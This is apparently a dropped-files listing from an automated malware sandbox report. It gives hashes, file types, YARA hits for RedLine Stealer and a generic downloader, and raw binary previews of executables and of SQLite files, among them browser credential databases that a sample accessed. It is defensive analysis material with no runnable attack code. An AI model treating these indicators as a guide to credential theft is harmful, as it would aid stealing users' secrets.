SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	unknown
Preview:	0

C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\780F.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4421000
Entropy (8bit):	7.98195304641259
Encrypted:	false
SSDEEP:
MD5:	1E40D9A53D79AA807EB8AF132F417E53
SHA1:	9CB867A33A7115138606479BAA740632F748BA81
SHA-256:	D803A1507AE95B77349968FA40C8B1A217C23CE7E54CCE2E5EF6CE73F7F576CA
SHA-512:	99B9AC8390D5FD7EC87AEC16E866DB0011AB8CE56D8A5CF54FEA97B257A5F3D2520726CE4FB238D57590A412F13D80F1BCA24AB5E4250EE23BBF86F3C82925EB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F..'r..'r..'r..u...'r..u.'r..u.3'r......'r..'s.?'r..u...'r..u.'r..u.'r.Rich.'r.................PE..L....U.c..................A.........j.........A...@...................................C.....................................L.B.P.....B..'...........jC...............................................................A..............................text.....A.......A................. ..`.rdata...9....A..:....A.............@..@.data....g...0B..&....B.............@....tutewi.A.....B......>B.............@....rsrc.....O...B..(...BB.............@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\33A6.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	307200
Entropy (8bit):	4.99875982143628
Encrypted:	false
SSDEEP:
MD5:	246EB9F40EF75F048C065DE2F8903289
SHA1:	4981B266CDCDE107B1E4F518310C1DA48393D813
SHA-256:	3E6DF4AA04A87D7B60AE86FB92674A5E2BD840F48AA420E6E574A5E61950B23F
SHA-512:	378C93C65A76ED54E748488FC3FA82E2823A4C0B402382C81FB51407D2839E35396A300B5B1D6E7D7353761CA4869CE9372EECD700C53D60B76321239BDCD200
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\33A6.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....i...............0.............~.... ... ....@.. ....................... ............@.................................0...K.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................`.......H.......L:..@v......z.......................................................(......0..A........s........~....%:....&~..........s....%.....(...+o.....8.....o...............%.r...prY..p~....(.....%.rq..pr...p~....(.....%.r...pr...p~....(.....%.r!..pra..p~....(.....(.......o......8,.....(......s.......s........~....}....~...........s....(....o....}......{....rq..pr...p~....(....o........9.....r...pr...p~....(.......8A......r...pra..p~....(....o....:......{....(....8......{....

C:\Users\user\AppData\Local\Temp\4854.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4818944
Entropy (8bit):	7.0734643050422275
Encrypted:	false
SSDEEP:
MD5:	1713300BA962C869477E37E4B31E40AF
SHA1:	D5C4835BC910ACCCD28DBED0C451043EA8DE95EF
SHA-256:	2BCDB7A75707F841615BE19F4BBCB95FC6B16CE19FB7EA782C5FF43EA1BE024D
SHA-512:	70B2A2B17C6B3A0A295BAF536451EF38C6E9E292A3C967A9FC950A6DE321BBAC0DC45E942EF151BA81B717F8EDE3166388E68CE75F2AFFF0EC16AEA98EA742E1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\4854.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....})...............P..H..\.......HH.. ...`H...@.. ........................I...........@..................................GH.K....`H.0X....................I.....iGH.............................................. ............... ..H............text...$(H.. ...H................. ..`.rsrc...0X...`H..Z...,H.............@..@.reloc........I.......I.............@..B.................HH.....H.......0...XF......?......]@............................................(....:..(....8......&~..........~......0..o.......8-.......E....>...89...s......... .....9....&8....s.........8....s.........8....s.........8....s.........8......0..$.......8....8....8.......~....o......8.....0...........~....o......8......8....8......0..$.......8......8....8.....~....o......8.....0..$.......8......8....8.....~....o .....8.....0..$.......8......*.~....o!.....8....8....8....&~..

C:\Users\user\AppData\Local\Temp\780F.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	19755520
Entropy (8bit):	7.996091217969365
Encrypted:	true
SSDEEP:
MD5:	ED2FD5173AF900C56220101CE6648515
SHA1:	D8783B8DC155314C5680AEBDDD4E36DF7DDFEBBF
SHA-256:	FF3022CC92FD5E0EB46D34568825A3D914A3CE7D24CEA60660CDB3247956F098
SHA-512:	EF7BAC0140E2E492A4D1751D9A6D1FE6EC94649BD6A00006F159A067B774EE8870D567E0FAE2E08EBF16DB3D11C2DFE2FCF5884D7D27D74FDBA34781500F9806
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.................h-...........-.. ....-...@.. ........................-...........@..................................-.S.....-.......................-...................................................... ............... ..H............text...4f-.. ...h-................. ..`.rsrc.........-......j-.............@..@.reloc........-......p-.............@..B..................-.....H.......$p-.............0(...G-..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,

C:\Users\user\AppData\Local\Temp\88D9.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	580608
Entropy (8bit):	7.660255427914398
Encrypted:	false
SSDEEP:
MD5:	1A344159928228AF15C9BD838C73E319
SHA1:	07295709B38BF6BAB750669E09DFE4671E03A345
SHA-256:	50CB0C5541343E8B900DDC1CB400A91D95A1ECD7D70EF0195D7C875CE7225321
SHA-512:	289AE9C41D6A535E576DA4780B195A6BB79CD10CA9EEDF4F39B9BB8D46931443924ED3E9524ABC54C10CB7B3603BA218BA200AD6A90E80481126D4CD8D996C46
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....e................................. ........@.. .......................@.......7....`.....................................K.......B.................... ......Q................................................ ............... ..H............text........ ...................... ..`.rsrc...B...........................@..@.reloc....... ......................@..B........................H.......(...d...............!,...........................................0..o.......8[...r...ps....z......8........(....(.... ....?....8....(.... .... .... ....s....(........8....~....:....8......(.....&~..........~......0..Q.......8........E........A.......R...C.......)...8....87... ....~;...{'...9....& ....8.......8.............i]..8Z...*.. ....<'... ....8...........8S... ...........8k......8....... ....8S... ...........8.......X..8m.........(.....8x............. ....~;

C:\Users\user\AppData\Local\Temp\928F.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5472256
Entropy (8bit):	7.353545386480907
Encrypted:	false
SSDEEP:
MD5:	04F93F610DF4D1C941EC7F64679E3039
SHA1:	11A8B38934A55D203FA78F13E9B7D24754BAF9DC
SHA-256:	351FADC9F1DDD2BD6BD34CEED2353B8211123E057B52C6AEB60A28643D92F137
SHA-512:	278AA98A5B62E5939150CEF08201A7344A95C3428F9E90E45C26DFACE8198ED6A1DD52FF830ED7E4DDD3FBC162D9E683EC11FD04AF62A505EE6FEEFCCC814B4B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...47....................Q...........Q.. ....Q...@.. ........................S...........@.................................p.Q.K.....Q.\|.....................S.......Q.............................................. ............... ..H............text....Q.. ....Q................. ..`.sdata........Q.......Q.............@....rsrc...\|.....Q.......Q.............@..@.reloc........S......~S.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9E77.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	459264
Entropy (8bit):	7.217548398117552
Encrypted:	false
SSDEEP:
MD5:	700A9938D0FCFF91DF12CBEFE7435C88
SHA1:	F1F661F00B19007A5355A982677761E5CF14A2C4
SHA-256:	946583A0803167DE24C7C0D768FE49546108E43500A1C2C838E7E0560ADDC818
SHA-512:	7FA6B52D10BCFC56AC4A43EDA11AE107347BA302CC5A29C446B2D4A3F93425DB486ED24A496A8ACD87D98D9CFB8CAD6505EB0D8D5D509BC323427B6931C8FFF8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......c.....................pD......!............@.......................... I.....l...........................................d.....G.................................................................@............................................text............................... ..`.rdata..>#.......$..................@..@.data.....B.........................@....rsrc.........G.....................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Bchxkx.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\F38F.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BroomSetup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5515264
Entropy (8bit):	6.479505821994318
Encrypted:	false
SSDEEP:
MD5:	00E93456AA5BCF9F60F84B0C0760A212
SHA1:	6096890893116E75BD46FEA0B8C3921CEB33F57D
SHA-256:	FF3025F9CF19323C5972D14F00F01296D6D7A71547ECA7E4016BFD0E1F27B504
SHA-512:	ABD2BE819C7D93BD6097155CF84EAF803E3133A7E0CA71F9D9CBC3C65E4E4A26415D2523A36ADAFDD19B0751E25EA1A99B8D060CAD61CDFD1F79ADF9CD4B4ECA
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......^..................?..........1?......@?...@..........................PV..................@...................0B.......A.@<...0G......................`B.t............................PB.....................p.A.D.... B......................text...\.>.......>................. ..`.itext...A....>..B....>............. ..`.data...d....@?.......?.............@....bss........ @..........................idata..@<....A..>....?.............@....didata...... B......:@.............@....edata.......0B......F@.............@..@.tls....T....@B..........................rdata..]....PB......H@.............@..@.reloc..t....`B......J@.............@..B.rsrc........0G.......E.............@..@.............PV......(T.............@..@................

C:\Users\user\AppData\Local\Temp\C086.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	361984
Entropy (8bit):	7.901105145978524
Encrypted:	false
SSDEEP:
MD5:	1A28322108062B67D4248CBFE145DEBF
SHA1:	21B9C10D6B47110C3D08ECC6C6840F25867BD3C7
SHA-256:	0BB567E2EA8A5A51A7DF5CDA9166C33F3CB368D6669D1A83A456AA881059C2C1
SHA-512:	B2FCF6554E2A9B87C85DDA0B0E0C05A2A38E648C38ABF4755FE8619A12774F15A2FF77E1DE2CAC0D0A10C64548D629124F7914E683A36699AC24FEA8D53F27D9
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^{_d.....................f......^<... ...@....@.. ....................................@..................................<..K....@...c........................................................................... ............... ..H............text...d.... ...................... ..`.rsrc....c...@...d... ..............@..@.reloc..............................@..B................@<......H.......D)..............@,...............................................0...........~......~....(....,.....+.......:.............s.........(........^..........:......................s......~..........(.....~..........(....... ....o....... ....o........o........o.........o........o.......o............io....s.....s...............-L. ...........+/...... ....o .................-.+.......o!........+...o".......o#....j.........:.....($.......+.......s%.......jo&....+a..o'........o

C:\Users\user\AppData\Local\Temp\CFAA.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3974656
Entropy (8bit):	7.919437401798076
Encrypted:	false
SSDEEP:
MD5:	460167998760122937411C5191649DBA
SHA1:	5A898F22647AEB96FA6A8D6780C1504E7C1AF9C7
SHA-256:	390FB6C1462D5D3203028D5BF64DCC4E7FEDFCEDFC705B3C688D1F0B60D7F264
SHA-512:	DD9C45C5130C18DF1BAB2AEB3E0C58CF6895A61F80574720EE3500EE295245CF775871A6A14F3B0FA19D73815FA27A5239688F93205C206B5CB31A9837553D75
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..x...........F\.. ........@.. ..............................KF=...@.................................:@..P....`..X........................................................................................................... ..... ...................... ..` .\|.......*..................@..@ ..... ......................@..B.idata... ...@......................@....rsrc.... ...`......................@..@.themida..W.........................`....boot.....:...\...:.................`..`........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Costura\1485B29524EF63EB83DF771D39CCA767\64\sqlite.interop.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\F38F.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1830064
Entropy (8bit):	6.605471997717241
Encrypted:	false
SSDEEP:
MD5:	02F50A23E31D1F21AA21AE52FAF3C05A
SHA1:	5B21234729DEDFA1B456138872EF2A046B9EE86F
SHA-256:	5F0E72E1839DB4AA41F560E0A68C7A95C9E1656BC2F4F4FF64803655D02E5272
SHA-512:	BC2FCCA125506D9B762DF4E9DF24A907B9E554D857E705945AE252E7E6B50DADA043EF0E69828B780AC9B569053FCF912C27A770469A80F1F6094C146AFDB9B0
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......rIF.6((.6((.6((.-....((.-....((.-...$((.?P..>((.(z..5((.6()..((.-...7((.-...7((.-...7((.-...7((.Rich6((.........................PE..d.....d.........." ................`O..............................................JN....@.........................................0G.......8..x................".......T...........................................................................................text............................... ..`.rdata..............................@..@.data...8....`...\|...H..............@....pdata...".......$..................@..@text....^....@......................@.. data.....c...`...d..................@..@.rsrc................j..............@..@.reloc...".......$...t..............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F38F.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3632640
Entropy (8bit):	6.982049154160612
Encrypted:	false
SSDEEP:
MD5:	9C815131562310CCECBBE81C49E57029
SHA1:	71B782B3C19123B2C6AAB622ED365ACFB8110CBA
SHA-256:	4954AE0F16D41249DA84F1FCA804B5E38D4AB9E637F8AE41C8FD65B14DF256BC
SHA-512:	5734AE24418BE7A6249EB5CB955E84871148BBD6DEE75DA467C0247905DE7327B165B5153C3312E43D14FB1B547EE584034FF1BD29C45246C0B2A32E8CF6D37C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,.e.........."...0..j7...........7.. ....7...@.. ........................7...........@...................................7.S.............................7...................................................... ............... ..H............text....i7.. ...j7................. ..`.reloc........7......l7.............@..B..........................................................7.....H............).....b....................................................(.......8.Y........ir.....~.(.......8.Y..S.$k.....H...)hL`............HN.{......5H....]f.9U."T.;..g,........>[A......;u.X,RqN,...H"l.Xi..D.Y..../.....)..,.j.....8..O.\|oV...s].....XsBl..l..D....?.kM.5.X.."..CL...../.W..=.............3.b..).]1....dA.%..6.#..%..\>..^...s....'..p%d......i?....G...84N.y.;>.:.H......m8.aC..z.=...E."o......l!B..M/.g.._..s...Z...<.7C.,.Q...."F@~...iq.j0

C:\Users\user\AppData\Local\Temp\Finfdgtl.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\F38F.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Gcmhqf.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\F38F.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Gymwglygw.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\F38F.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Hnysq.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\F38F.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\780F.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	2349777
Entropy (8bit):	7.989509381889276
Encrypted:	false
SSDEEP:
MD5:	31F42479194700F598C22EA83FA196C1
SHA1:	0552CA7766283D7ADD7C06312ECB5E858D3A2EA0
SHA-256:	098B76A1D654EFE963B1D6167DC77D34627B8488D742C49BFB70E8D70B1755A7
SHA-512:	AFC83E94DC92453312A4D24193B0D3C17CF37644A5CF25B2C934F27D58968C41A5B176DE12C2C5C5C8C1D2FBDB57D235A5073FE304F6B12E11A40E2CB52EE836
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@..........................@............@..........................................P..`............................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc...`....P......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Jlklc.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\F38F.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Jlxmu\fqs92o4p.default-release\cert9.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\F38F.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	229376
Entropy (8bit):	0.64343788909108
Encrypted:	false
SSDEEP:
MD5:	B6787B79D64948AAC1D6359AC18AB268
SHA1:	0831EB15AB2B330BE95975A24F8945ED284D0BA4
SHA-256:	9D6FD3B8AB8AA7934C75EDE36CEB9CF4DDAD06C5031E89872B4E814D7DB674E2
SHA-512:	9296866380EF966F1CB6E69B7B84D1A86CD5AE8D9A7332C57543875FAA4FC7F1387A4CF83B7D662E4BAB0381E4AFC9CB9999075EBB497C6756DF770454F3530E
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Jlxmu\fqs92o4p.default-release\key4.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\F38F.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08436842005578409
Encrypted:	false
SSDEEP:
MD5:	2CD2840E30F477F23438B7C9D031FC08
SHA1:	03D5410A814B298B068D62ACDF493B2A49370518
SHA-256:	49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
SHA-512:	DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Oevtof.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\F38F.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Poddpfzff.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\F38F.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\4854.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	760320
Entropy (8bit):	6.561572491684602
Encrypted:	false
SSDEEP:
MD5:	544CD51A596619B78E9B54B70088307D
SHA1:	4769DDD2DBC1DC44B758964ED0BD231B85880B65
SHA-256:	DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
SHA-512:	F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Qrylwjoz.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\F38F.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Qwwgtekoyxr.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\F38F.exe
